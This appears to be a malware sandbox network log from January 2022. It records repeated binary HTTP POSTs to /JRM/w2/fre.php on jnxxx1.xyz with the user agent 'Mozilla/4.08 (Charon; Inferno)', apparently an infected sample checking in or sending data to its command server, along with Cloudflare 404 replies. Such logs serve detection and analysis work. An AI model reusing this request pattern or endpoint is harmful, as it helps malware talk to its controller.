                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
                Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:25:18 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hi6EP8s%2FA6JM%2BRfu5cWelq8dHnWlM%2B89T9op67hAOd3ZG8Tvr3hS5TiyaLVdcu2jTPqCChMpx5nPsK2UQxsu8fd%2FrnlS%2BP3oLufopYezdUg3uyKNqp8JhbUvFs%2Fg"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd73084abee717a-DUSalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:25:20 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nRMKvgI%2F0%2F2n899Ft%2FZSKTFJQFPnhZW11EVr9Rqdz%2FmHh3k5zZvZuHois03vtzJeSblchTHtmekHUN3OqsS0zS88IbX2dihqTK0mi6La%2BTDXa59E9fB5BSPVn2Ll"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd7308f7ebe7172-DUSalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:25:22 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wfRwINA8sizrSXJoN1k3qO6EE7W9%2FUVuj%2F9R9GnQ2koZzil1mauU3M9CDhUOGqCQa974KV1DUJtCRSnjA1y6GBUIFUMm0T8vH8aXmpJ5uHb%2Fd1Ujk4nxbnF0CdbT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd7309819b78745-DUSalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:25:23 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=R%2F%2BK8SVfC5ohsf5ypjZukQUxybr3HAsQTWDtDcDXSbnMW9JxaZP7acpJr4RKulgYRMQXJGPwP7krkH7BnrCvF3%2BRLS0lw1BmgNMJsLjE91QANmfP8BBqYRwu5bgj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd730a4692e7a49-DUSalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:25:25 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AYbx1EPjW8M38lBfcRioiBFm4Sb7UXA6FpLGg384JWnA%2B32O5P%2B2%2FK38UHyCe%2FlFMbNWCX7nbpLAK4pELGSnIf3LF11nYah2qFJyOBrdcs7baB2gdp%2F8T5PpvBtL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd730afbc44695d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:25:26 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Gj0NK4oB%2BBli7ZTUP7LAptCxJVybdnOjIg%2FBIPdc9x5ijdtMpsCm%2FmB1NxAkaTDt3fxhLrJfH1YsdlR47tKujnu%2BxLKvVlECRwGpobB%2FAU3Y5bcd2fQsumLurHOT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd730b84e090b6f-AMSalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:25:28 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TxJWTM6gV0MTxW7YM%2BTe%2B5DdsSmvL7k%2B35hgMP2DQenr130cmDAXD5htYd6lP4ns1u%2BwYFYQpq9PcE8CaPi6IhueR49tx%2Bl%2F%2FlT90EymPUkUKZlCqPx0CkQ2beeU"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd730c1fdb84ed9-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:25:30 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=M68OGhqQEPxISEtsq3%2B5H%2FacME1RbwOvO0nDBEz1uxYpVByK3taPs0%2Fqmqaw72x63%2BIeUJaLo%2FOxOewiB042x6no%2B9SIy1aKbFAO63Js7EYkJ%2FigW6rsaVY9WXkN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd730cfca0f2199-DUSalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:25:32 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bLPL1apjWIi%2FQT07ycYbV1MKsMRYQ3dKEOqXP4PeN3UTzD3LbRQE6A7cE1yOR4GeNNfNzZpHhyijJcKc067J50RlhtmlwjQoY1%2BXZ68si4VJhySftXIBnfteo2uk"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd730d8fb134bdd-AMSalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:25:33 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BZtSZWSuZoGDTDEek1iQ%2BbCSgcHWt2TDaku2Hp9VK0tn7OUHo%2BuTrbydgLb3W49GEdKDwuRX4Do57txLMlkGOK5k00FDPIaLLAv0EHeQc62Uz0VEE8IZW6spjHk3"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd730e228f8717b-DUSalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:25:34 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LgJg09fdfh163T5amD1arIYDv%2FNwSAADTX4ablO%2FZYppqWhI9Tk4rVdpHkhMtQP9XjHiYkj3GHAo44zVwo%2Fl5HrWcAQOLmjqJ4%2BVZZaQ9W94HGXsRqkwMK8uHqtt"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd730eb7b0e68eb-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:25:36 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ug8%2FAGi89aQisThCg%2BnxGvAgvoNw%2Fic%2BvC8b4kXYDPt1fAulMzxSdpmEX%2BIe7CQNaf7o5RL2%2FStbKvWuv6tXYQefJhyvAip%2F2mwNrm%2BoNWkg%2FkyeCXqekKD%2Fagql"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd730f3cf35cdbf-CDGalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:25:37 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xPKJxy99APDIhlVAha7cTUa%2FITUb7rrhYx9hVKGRS504XUq1CplU5Mj0hHOtPQIQw45EcMbbtTr6VwAC5jC%2FVRmTE8d7YFkiiqSNayLb93LRwpY3g8O3gjh300dc"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd730fc5ead3bd4-CDGalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:25:39 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9kbgl8GYzYqDHxzTNpojc1OOLQ9g7Uf2N9Fg8XRZwk5oYDgucvNB4Ij3BciCJ263fVh2RHwrMkc9HdwWWr9sfh1CNnhScLcUpwtae4XvqbXAnAbelGSSTkwFMZIp"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd731064b4e4bf5-AMSalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:25:41 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZgGoPHBueohZRmwh5mDFogsODharUtfq9CNIDypSehPnxGQ5cggmwF%2BO%2FLutdMI3%2FxmnUtgX6aXATJnX8PJ4qWyQmUplB26zccPzxzejORfjwOaxeTtHlih6a%2FCl"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd73116fa2a2014-AMSalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:25:44 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uvYvXjYPLMwGtndoIeApkR0ECRQ3x8cuNoQFYarnTRWoAt8vBuDfRyycp3q75GFmWPK%2Bc8H6FvlZmS50XvQsKeeLZbEhNl6SodeIRaysfC3rcNPunWHZQRXkAccQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd73125dc534242-AMSalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:25:46 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dal10SZcT1tL%2FuvxOfyxO2m0u%2FF2fcKDAf6OUzw7FSKfnQU89eXnekvZ%2F0sSOez89pJQMhyFfrM8vcaIrlrZ3VCppeUQcEW3YOn8z%2FVhm4J8pXuX3S%2FV3SMmDQaF"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd73135cc481ee7-AMSalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:25:48 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wpyAwjfJFUCS82v8TaElEXzTWShQhtQiJb93uGnV0KxbylLElIs6i%2BYixkVZmOpJCwkN3nPbiIZ2kc1uQASuAM1P49MhRlztH10tpn9pSAeRFdgoqae8CA3i1AFM"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd731411da83ba3-CDGalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:25:50 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LXsNoX67xKYIOkJtyuMYXG%2B2NDusQ7rQ2Lr6CWwfFGY6Tnt%2FktGdOjES9LEQKjyc3XTahUJkuTvOoYoLm6mAMARa4ZknwjsKj8%2BUwHoDs2FhNjd9v8xHoFZjVNGO"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd7314be956695e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:25:52 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ftz2WOk1p%2BDDAbf5X9IOG9113w6gCMkpMwhBgkDAFd3Q%2FYEbCO5G5AUB0oNVxHMiDfMaFilkV3DQUXxCsFq2rycZzsswGgs82RcZROk0Bw7tXhpkTKBzxX5%2BT9F2"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd7315688288b8a-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:25:53 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wDGp1Oy9HbaC4yr2lUMdpdFPuUFOf4XKBQmLKcz%2B%2FGOF3Qi0E%2FBBx%2BOGiKvEXsBwxoaqsQTZSamfYBlZf8b0RA81%2BDty9I1Dtr5uZlJk7JEAveVTZOu3cfKlGl1F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd7315f49a2716e-DUSalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:25:55 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jCvc1U0c1tN8iO6BaKruFdADsQSpn5I1LqLJlB%2BzBz01yfvoHPAmlyy%2FMDZj4p7oybDxInvculkNpZdhfeRr4L1caCFmHWq1YrmXkjgwnTyl94jXHWZSNC2T4Ttc"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd7316abb96717b-DUSalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:25:57 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uHfXZBYQdshooUaQuzbYJcvo9mOuNBa76dW4JZDk4UArpHKYn%2Fc%2BszzOH07CY4vbXKzBK2ZoeBEX5GaOGMSjayGafdHfYhmOususAbHIflJpDP%2Fb0N%2BDR4BtqVZx"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd7317a5b3c409f-CDGalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:25:59 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SMTPnJ325vghWLNNjG2zelmaLADkubjhY3eMe4D37v4kPwvlXilvMCK%2FK94aUpgg26lOVcet33gjLb3R4F3U8iucT1AzCaBDoALvhB0jFmdasLsb3QnLuKtesfzf"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd73185bea64eaf-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:26:01 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=atqdpgwD3aXEHkvBrkTfE0gOJhiOB%2FVogHc%2Fr3MT9S%2BaVfj%2BWsubd9uuf%2B1PrHsXXeCrWTWsH%2FrzCTAFKpaHUBx5oGrvQHmybKb6RcHUjdFM7c79XL7%2BKD7LRwF%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd73191f9fa0b88-AMSalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
